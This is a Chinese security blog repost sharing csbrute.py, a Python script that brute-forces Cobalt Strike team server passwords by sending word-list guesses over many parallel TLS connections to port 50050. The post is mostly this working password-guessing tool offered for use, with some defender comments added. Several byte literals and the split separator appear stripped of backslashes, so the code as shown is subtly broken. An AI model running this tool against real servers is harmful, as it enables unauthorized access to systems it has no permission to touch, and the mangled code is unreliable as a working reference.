爆破cobalt strike密码脚本

admin 2022年3月7日02:14:25评论295 views字数 3827阅读12分45秒阅读模式






无聊的我又来水文了,今天分享的是爆破 cobalt strike 密码的脚本。最近活脱脱成了一个 GITHUB 的安(搬)利(运)管(工),其余时间都是在写作业和整理自己的知识体系,学得太杂了,别忘了点赞哦!


你也可以来昨天发的那个QQ群一起探讨下“渗透测试中的信息收集方式有哪些”,欢迎来做作业。后台回复【QQ群】获取群号。


GITHUB地址:https://github.com/ryanohoro/csbruter


最近的文章总是这么朴实无华,且枯燥,工具的源码如下,字典文件可以用passwdtop1000

#!/usr/bin/env python3
# csbrute.py - Cobalt Strike Team Server Password Brute Forcer
#
# Command-line front end: takes a team server address, an optional word list
# file, a port (default 50050) and a concurrency level (default 25 threads).
#
# Defender's note: the defaults mean that a run against an exposed team server
# shows up as many parallel TLS connections to the management port from one
# client. Limiting which source addresses can reach that port, and using a
# long password that is not in common word lists, both blunt this kind of
# guessing.
import argparse
import concurrent.futures
import socket
import ssl
import sys
import time

# https://stackoverflow.com/questions/6224736/how-to-write-python-code-that-is-able-to-properly-require-a-minimal-python-versi
# Stop early on interpreters older than the minimum version below.
MIN_PYTHON = (3, 3)
if sys.version_info < MIN_PYTHON:
    sys.exit("Python %s.%s or later is required.n" % MIN_PYTHON)

parser = argparse.ArgumentParser()
parser.add_argument(
    "host",
    help="Teamserver address",
)
# The word list is optional; the main script reads stdin when it is omitted.
parser.add_argument(
    "wordlist",
    nargs="?",
    help="Newline-delimited word list file",
)
parser.add_argument(
    "-p",
    dest="port",
    default=50050,
    type=int,
    help="Teamserver port",
)
parser.add_argument(
    "-t",
    dest="threads",
    default=25,
    type=int,
    help="Concurrency level",
)

# Parsed once at import time; the rest of the script reads this global.
args = parser.parse_args()
# https://stackoverflow.com/questions/27679890/how-to-handle-ssl-connections-in-raw-python-socket

class NotConnectedException(Exception):
    """Raised when a send or receive is attempted without an open TLS socket.

    Attributes:
        message: optional human-readable description.
        node: optional extra context supplied by the raiser.
    """

    def __init__(self, message=None, node=None):
        # Both fields are stored as given; the base-class initialiser is not
        # called explicitly.
        self.message, self.node = message, node

class DisconnectedException(Exception):
    """Exception type carrying an optional message and node.

    Attributes:
        message: optional human-readable description.
        node: optional extra context supplied by the raiser.
    """

    def __init__(self, message=None, node=None):
        # Both fields are stored as given; the base-class initialiser is not
        # called explicitly.
        self.message, self.node = message, node

class Connector:
    """Minimal TLS client wrapper around one TCP connection.

    The TLS context is created with certificate verification turned off, so
    the identity of the peer is never checked.
    """

    def __init__(self):
        self.sock = None
        self.ssl_sock = None
        context = ssl.SSLContext()
        # CERT_NONE: accept whatever certificate the server presents.
        context.verify_mode = ssl.CERT_NONE
        self.ctx = context

    def is_connected(self):
        """Return a truthy value only when both socket attributes are set."""
        return self.sock and self.ssl_sock

    def open(self, hostname, port):
        """Create a TCP socket with a 10 second timeout, wrap it in TLS, connect.

        When *hostname* equals this machine's own host name it is resolved to
        the first address reported by ``gethostbyname_ex`` before connecting.
        """
        raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock = raw
        raw.settimeout(10)
        self.ssl_sock = self.ctx.wrap_socket(raw)

        target = hostname
        if hostname == socket.gethostname():
            target = socket.gethostbyname_ex(hostname)[2][0]
        self.ssl_sock.connect((target, port))

    def close(self):
        """Close the plain socket if present and clear both socket attributes."""
        # NOTE(review): only self.sock is closed here; the wrapped TLS socket
        # is just dereferenced.
        if self.sock:
            self.sock.close()
        self.sock = self.ssl_sock = None

    def send(self, buffer):
        """Send all of *buffer* over the TLS socket.

        Raises:
            NotConnectedException: if no TLS socket has been opened.
        """
        if not self.ssl_sock:
            raise NotConnectedException("Not connected (SSL Socket is null)")
        self.ssl_sock.sendall(buffer)

    def receive(self):
        """Read from the TLS socket until at least 4 bytes have arrived.

        Returns:
            All bytes read, which may be more than 4.

        Raises:
            NotConnectedException: if no TLS socket has been opened.
        """
        if not self.ssl_sock:
            raise NotConnectedException("Not connected (SSL Socket is null)")

        collected = b""
        # NOTE(review): an empty read does not advance the count, so the loop
        # only ends on enough data or on an exception from recv().
        while len(collected) < 4:
            collected = collected + self.ssl_sock.recv()
        return collected

def passwordcheck(password):
    """Try one candidate password against the configured team server.

    A fresh ``Connector`` is opened to ``args.host``/``args.port`` for every
    call. The request is a fixed 4-byte header literal, one signed length
    byte, and the ASCII-encoded password padded to 256 bytes with ``b"A"``.

    Defender's view: each guess is a separate TLS connection carrying one
    fixed-size request, so repeated guessing is visible on the server side as
    a run of short-lived connections from the same client.

    Returns:
        The password when the reply equals the expected 4-byte literal,
        ``False`` for any other reply, and ``None`` for a blank password
        (which is skipped with a message).

    Raises:
        OverflowError: if the password is longer than 127 characters (the
            length must fit in one signed byte).
        UnicodeEncodeError: if the password is not pure ASCII.
    """
    if len(password) <= 0:
        print("Ignored blank password")
        return None

    link = Connector()
    link.open(args.host, args.port)

    # The byte literals are reproduced exactly as they appear in this listing.
    length_byte = len(password).to_bytes(1, "big", signed=True)
    padded = bytes(bytes(password, "ascii").ljust(256, b"A"))
    link.send(bytearray(b"x00x00xbexef") + length_byte + padded)

    reply = link.receive() if link.is_connected() else None
    if link.is_connected():
        link.close()

    return password if reply == bytearray(b"x00x00xcaxfe") else False
# Load the candidates: from the word list file when one was named on the
# command line, otherwise one per line from standard input.
# The split separator is reproduced exactly as it appears in this listing.
if args.wordlist:
    print("Wordlist: {}".format(args.wordlist))
    passwords = open(args.wordlist).read().split("n")
else:
    print("Wordlist: {}".format("stdin"))
    passwords = [line.rstrip() for line in sys.stdin]

if not passwords:
    print("Password(s) required")
else:
    print("Word Count: {}".format(len(passwords)))
    print("Threads: {}".format(args.threads))

    start = time.time()

    # https://stackoverflow.com/questions/2846653/how-to-use-threading-in-python
    # attempts counts checks that returned normally, failures counts checks
    # that raised (connection errors, encoding errors, ...).
    attempts = 0
    failures = 0

    # Defender's view: up to args.threads checks are in flight at once, and
    # every check opens its own connection, so the server sees that many
    # concurrent TLS sessions from one source for the duration of the run.
    with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
        pending = {
            executor.submit(passwordcheck, candidate): candidate
            for candidate in passwords
        }
        for done in concurrent.futures.as_completed(pending):
            candidate = pending[done]
            try:
                outcome = done.result()
                attempts += 1
                if outcome:
                    print("Found Password: {}".format(candidate))
            except Exception as exc:
                failures += 1
                print('%r generated an exception: %s' % (candidate, exc))

    print("Attempts: {}".format(attempts))
    print("Failures: {}".format(failures))
    finish = time.time()
    elapsed = finish - start
    print("Seconds: {:.1f}".format(elapsed))
    print("Attemps per second: {:.1f}".format((failures + attempts) / elapsed))

本文始发于微信公众号(渗透云笔记):爆破cobalt strike密码脚本

admin
  • 本文由 发表于 2022年3月7日02:14:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   爆破cobalt strike密码脚本http://cn-sec.com/archives/491398.html
